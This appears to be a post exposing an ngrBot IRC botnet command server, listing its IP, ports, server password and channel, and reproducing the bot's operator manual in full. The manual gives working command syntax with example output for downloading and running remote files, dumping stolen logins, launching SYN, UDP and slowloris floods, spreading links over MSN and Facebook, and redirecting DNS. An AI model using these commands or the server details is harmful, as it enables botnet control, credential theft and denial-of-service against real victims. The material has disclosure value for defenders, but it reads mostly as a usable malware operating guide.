64.186.134.161(ngrBot 1.0.3 hosted in United States Atlanta Vpsland.com Llc)

Older version of ngrBot with the original manual included

Remote Host Port Number
199.15.234.7 80
64.186.134.161 7834 PASS puto

NICK n{US|XPa}civmqel
USER civmqel 0 0 :civmqel
JOIN #dr3 ngrBot

Now talking in #dr3
Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]
Topic By: [ root3d ]
(root3d) /lusers

topic says everything u have to know about ngrBot lol

here i m including the manual just in case he delete it

Commands:
#p - pdef(also known as the botkiller/protection)
#r - ruskill(shows what bots you ruskilled (when selling installs you use to keep your bots)
#f - ftps
#l - formgrabber logins
#s - usb, msn, facebook

Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.

    !dl [url] <md5> <-r> <-n>

    The bot downloads and executes a file from the specified URL.

    Parameters
    url    URL of the file to download and execute
    md5    optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
    -r    Enable RusKill on downloaded file
    -n    Disables PDef+ on the system until reboot or until it is manually re-enabled

    Example

    [00:00:00] <You> !dl http://example.com/test.exe
    [00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/test.exe" s="94208 bytes"] Executed file "C:UsersAdministratorAppDataRoamingABCD.tmp"
    [00:00:10] <You> !dl http://example.com/bot.exe -r
    [00:00:15] <{RU|W7a}abcdefg> [d="http://example.com/bot.exe" s="188416 bytes"] Executed file "C:UsersAdministratorAppDataRoaming1234.tmp"
    [00:00:15] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:Documents and SettingsAdministratorApplication Data1234.tmp"
    [00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected File: "C:DOCUME~1ADMINI~1LOCALS~1Templsass.exe"
    [00:00:16] <{RU|W7a}abcdefg> [Ruskill]: Detected Reg: "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun"
    [00:00:17] <{RU|W7a}abcdefg> [Ruskill]: Detected DNS: "cnc.example.com"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !up [url] [md5] <-r>

    The bot updates its file, but the update does not take effect until the system is restarted.

    Parameters
    url    URL of the file to update to
    md5    MD5 hash of the update file
    -r    Reboot immediately

    Example

    [00:00:00] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57
    [00:00:05] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="87040 bytes"] Update error: MD5 mismatch (857526760C0E67BB502B7183DEE52767 != 58050954C432B8786284C4E0C7011A57)
    [00:00:15] <You> !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57
    [00:00:20] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="94208 bytes"] Updated bot file "C:UsersAdministratorAppDataRoamingZyxwvu.exe"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

   !die

    The bot disconnects from the IRC server and does not reconnect until its system reboots.

    Example

    [00:00:00] <You> !die
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !rm

    The bot will remove itself from the system.

    Example

    [00:00:00] <You> !rm
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !m [state]

    Enable/disable all output to IRC regarding to commands and features.

    Parameters
    state    Enable (on) or disable (off) muting of all output to IRC

    Example

    [00:00:00] <You> !m on
    [00:00:05] <You> !v
    [00:00:10] <You> !m off
    [00:00:15] <You> !v
    [00:00:16] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:UsersAdministratorAppDataRoamingZyxwvu.exe"]

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !v

    The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.

    Example

    [00:00:00] <You> !v
    [00:00:01] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:UsersAdministratorAppDataRoamingZyxwvu.exe"]

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !vs [url] [state]

    The bot creates a browser instance and visits the specified link.

    Parameters
    url    URL to open
    state    Open in a visible (1) or invisible (0) window

    Example

    [00:00:00] <You> !vs http://example.com/ 0
    [00:00:01] <{RU|W7a}abcdefg> [Visit]: Visited "http://example.com/"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !rc <-n|-g>

    The bot disconnects from the IRC server and waits 15 seconds before reconnecting.

    Parameters
    -n    Only reconnect if the bot is currently marked as "new"
    -g    Only reconnect if the bot did not previously succeed in determining its country using GeoIP

    Example

    [00:00:00] <You> !rc
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)
    [00:00:16] * <{RU|W7a}gfedcba> (gfedcba@127.0.0.1) has joined #boss
    [00:00:25] <You> !rc -g
    [00:00:26] * <{ESP|W7a}abcdefg> (abcdefg@127.0.0.2) Quit (Connection reset by server)
    [00:00:41] * <{MX|W7a}gfedcba> (gfedcba@127.0.0.2) has joined #boss

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !j [<[rule] [options]> channel] <key>

    The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.

    Parameters
    rule    Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
    options    Options for selected rule
    With -c, you can put a single or multiple comma-separated country code(s)
    With -v, you can put a single or multiple comma-separated version(s)
    channel    Channel to join
    key    Key of channel to join

    Example

    [00:00:00] <You> !j #test k3y
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test
    [00:00:05] <You> !j -c RU #test2 k3y
    [00:00:10] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test2
    [00:00:11] <You> !j -c US,GB,AU,CA,RU #test3 k3y
    [00:00:15] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test3
    [00:00:15] <You> !j -v 1.0.3 #test4 k3y
    [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test4

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !p [<[rule] [options]> channel]

    The bot parts the specified channel.

    Parameters
    rule    Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
    options    Options for selected rule
    With -c, you can put a single or multiple comma-separated country code(s)
    With -v, you can put a single or multiple comma-separated version(s)
    channel    Channel to part

    Example

    [00:00:00] <You> !p #test
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test
    [00:00:05] <You> !p -c RU #test2
    [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test2
    [00:00:10] <You> !p -c US,GB,AU,CA,RU #test3
    [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test3
    [00:00:15] <You> !p -v 1.0.3 #test4
    [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test4

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

   !s <rule>

    The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).

    Parameters
    rule    Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)

    Example

    [00:00:00] <You> !s
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #RU
    [00:00:05] <You> !s -o
    [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #W7
    [00:00:10] <You> !s -u
    [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #admin
    [00:00:15] <You> !s -v
    [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #1.0.3

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !us <rule>

    The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).

    Parameters
    rule    Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)

    Example

    [00:00:00] <You> !us
    [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #RU
    [00:00:05] <You> !us -o
    [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #W7
    [00:00:10] <You> !us -u
    [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #admin
    [00:00:10] <You> !us -v
    [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #1.0.3

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !mod [module] [state]

    Enable/disable modules that use hooks.
        Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.

    Parameters
    module    Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
    state    Enable (on) or disable (off) module

    Example

    [00:00:00] <You> !mod ftpgrab off

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !stats <-l|-s>

    Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.

    Parameters
    -l    Display login grabber stats
    -s    Display spreading stats

    Example

    [00:00:00] <You> !stats
    [00:00:01] <{RU|W7a}abcdefg> [usb="3" msn="10" http="2" total="15"]
    [00:00:02] <{RU|W7a}abcdefg>

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !logins <site|-c>

    Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.

    Parameters
    site    Site to retrieve logins for (case insensitive, see here for the list of sites)
    -c    Clear login cache

    Example

    [00:00:00] <You> !logins
    [00:00:01] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123
    [00:00:02] <{RU|W7a}abcdefg> [Logins]: YouTube ->> noob@mail.ru : password321
    [00:00:05] <You> !logins facebook
    [00:00:06] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !stop

    The bot will end all running flood tasks.

    Example

    [00:00:00] <You> !udp example.com 80 60
    [00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)
    [00:00:30] <You> !stop
    [00:00:31] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !ssyn [host] [port] [seconds]

    See here.

    Parameters
    host    Host to flood with SYN requests
    port    Port to flood. If 0, the bot uses a random port
    seconds    Number of seconds to flood the target

    Example

    [00:00:00] <You> !ssyn example.com 80 60
    [00:00:01] <{RU|W7a}abcdefg> [SYN]: Starting flood on "example.com:80" for 60 second(s)
    [00:01:01] <{RU|W7a}abcdefg> [SYN]: Finished flood on "example.com:80"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !udp [host] [port] [seconds]

    See here.

    Parameters
    host    Host to flood with UDP packets
    port    Port to flood. If 0, the bot uses a random port
    seconds    Number of seconds to flood the target

    Example

    [00:00:00] <You> !udp example.com 80 60
    [00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)
    [00:01:01] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !slow [host] [minutes]

    See here.

    Parameters
    host    Host to flood using slowloris
    minutes    Number of minutes to flood the target

    Example

    [00:00:00] <You> !slow example.com 3
    [00:00:01] <{RU|W7a}abcdefg> [Slowloris]: Starting flood on "example.com" for 3 minutes
    [00:03:01] <{RU|W7a}abcdefg> [Slowloris]: Finished flood on "example.com"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !msn.int [interval]

    Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.
        Note: use '#' for a random interval between 1 and 9.

    Parameters
    interval    Number of MSN messages before spread

    Example

    [00:00:00] <You> !msn.int 3
    [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread interval to "3"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
  !msn.set [message]

    Set the message that will be used for MSN spreading. See here for more information.
        Note: use '#' for a random digit and '*' for a random lowercase letter.

    Parameters
    message    Message to spread via MSN

    Example

    [00:00:00] <You> !msn.set LOL http://example.com/img###/*****/DSC0001.jpg
    [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

!http.int [interval]

    Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.
        Note: use '#' for a random interval between 1 and 9.

    Parameters
    interval    Number of Facebook messages before spread

    Example

    [00:00:00] <You> !http.int 3
    [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated HTTP spread interval to "3"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 !http.set [message]

    Set the message that will be used for Facebook spreading. See here for more information.
        Note: use '#' for a random digit and '*' for a random lowercase letter.

    Parameters
    message    Message to spread via Facebook

    Example

    [00:00:00] <You> !http.set LOL http://example.com/img###/*****/DSC0001.jpg
    [00:00:01] <{RU|W7a}abcdefg> [HTTP]: Updated HTTP spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 !mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]

    The bot will block access to or redirect the specified domain/IP address.
        Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.
        Note: it must be the exact domain, for example "example.com" will not include "www.example.com". Wildcard support will be added in an update.

    Parameters
    url    Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
    domain1    Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
    ip1    Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
    domain2    DNS queries for domain1 will be redirected to this domain if set
    ip2    DNS queries for ip1 or domain1 will be redirected to this IP address if set

    Example

    [00:00:00] <You> !mdns mail.example.com
    [00:00:01] <{RU|W7a}abcdefg> [DNS]: Blocked "mail.example.com"

    [00:00:05] <You> !mdns http://www.example.com http://www.mysite.com
    [00:00:06] <{RU|W7a}abcdefg> [DNS]: Redirected "www.example.com" to "www.mysite.com"
    [00:00:10] <You> !mdns 127.0.0.1 127.0.0.2
    [00:00:11] <{RU|W7a}abcdefg> [DNS]: Redirected "127.0.0.1" to "127.0.0.2"


hosting infos:
http://whois.domaintools.com/64.186.134.161